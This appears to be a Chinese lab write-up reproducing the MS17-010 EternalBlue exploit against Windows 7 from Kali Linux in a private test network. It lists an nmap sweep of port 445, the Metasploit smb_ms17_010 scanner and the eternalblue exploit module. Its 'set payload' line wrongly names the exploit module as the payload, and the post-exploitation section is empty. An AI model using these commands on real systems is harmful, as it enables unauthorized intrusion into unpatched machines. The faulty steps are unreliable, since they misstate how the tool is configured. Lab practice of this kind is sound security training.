我们将使用以下工具对此进行演示
- 厉害的Linux
- win7
- VMware或VirtualBox(虚拟环境)
注意:此实验仅用于教育目的,任何非法活动概不负责。
测试目的:
通过实施针对性的渗透测试,发现win7系统的安全漏洞,复现ms17-010,熟悉渗透测试流程。
测试范围:
本次测试的范围详细如下:
| 系统名称 | 未知 |
| 测试时间 | 2020.10.24 |
| 测试工具 | kali linux |
| 说明 | 本次渗透测试过程中使用网络环境为私有内网 |
数据来源:
通过漏洞扫描和手动分析获取相关数据。
全网搜索445端口
nmap -p 445 192.168.31.0/24
搜索ms17-010
auxiliary模块 检查漏洞:
use 1 或者use auxiliary/scanner/smb/smb_ms17_010
发现漏洞存在
渗透利用:
搜索ms17-010 :search ms17-010
使用exploit永恒之蓝设置参数: use 2 或exploit/windows/smb/ms17-010_eternalblue
设置攻击负载:set payload 2 或者 set payload exploit/windows/smb/ms17-010_eternalblue
攻击成功:
后渗透: